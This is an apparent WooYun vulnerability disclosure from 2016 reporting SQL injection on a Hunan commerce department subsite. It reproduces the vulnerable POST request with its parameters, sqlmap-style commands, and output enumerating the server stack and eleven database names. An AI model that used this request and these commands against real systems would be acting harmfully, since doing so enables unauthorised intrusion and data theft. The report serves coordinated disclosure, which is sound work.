
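Vulnerability Summary

Defect ID: wooyun-2016-0170011

Vulnerability title: SQL injection in a subsite of the Hunan Provincial Department of Commerce leads to information disclosure

Affected vendor: CNCERT (National Internet Emergency Center)

Author: IceKing

Submitted: 2016-01-17 18:52

Fixed: 2016-03-04 13:27

Published: 2016-03-04 13:27

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]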



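Vulnerability Details

Disclosure status:

2016-01-17: Details reported to the vendor; awaiting vendor handling
2016-01-20: Vendor has confirmed; details disclosed to the vendor only
2016-01-30: Details disclosed to core white hats and experts in related fields
2016-02-09: Details disclosed to regular white hats
2016-02-19: Details disclosed to intern white hats
2016-03-04: Details disclosed to the public

Brief description:

RT (as the title says)

Detailed description: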

POST /Modules/XingZhengXuKe/XuKeShenQing_FanKui.aspx?JiGouBianHao=430000&ZT=sfdfsfsf HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/Modules/XingZhengXuKe/XuKeShenQing_FanKui.aspx?JiGouBianHao=430000&ZT=sfdfsfsf
Cookie: ASP.NET_SessionId=2qljzm55bdd2jc45plnzwb45
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9858

__VIEWSTATE=[ViewState value omitted]&__EVENTVALIDATION=[value omitted]&LoginTrControl1%24Text_Account=&LoginTrControl1%24Text_PW=&LoginTrControl1%24PassCode=&p_keyword=%25&TextBox1=&Text_list=&Hidden1=&TextBox2=&ZheCeShiJian_C=&ZheCeShiJian_D=&ImageButton1.x=50&ImageButton1.y=17
-r e:\k.txt
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
-r e:\k.txt --dbs
available databases [11]:
[*] FileManage
[*] GoldSoftPA
[*] GoldSoftPAtest
[*] master
[*] model
[*] msdb
[*] OA
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] XZZF
-r e:\k.txt --tables


[Screenshots: 1.png, 2.png, 3.png, 4.png]

Proof of vulnerability:

[Screenshot: 4.png]

Remediation:

Fix it.

Copyright notice: when reposting, please credit the source IceKing@WooYun


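Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-01-20 15:09

Vendor reply:

CNVD confirmed the report without reproducing the described situation; it has been passed via CNCERT to the Hunan branch center, which will follow up and coordinate handling with the organization that manages the website.

Latest status:

None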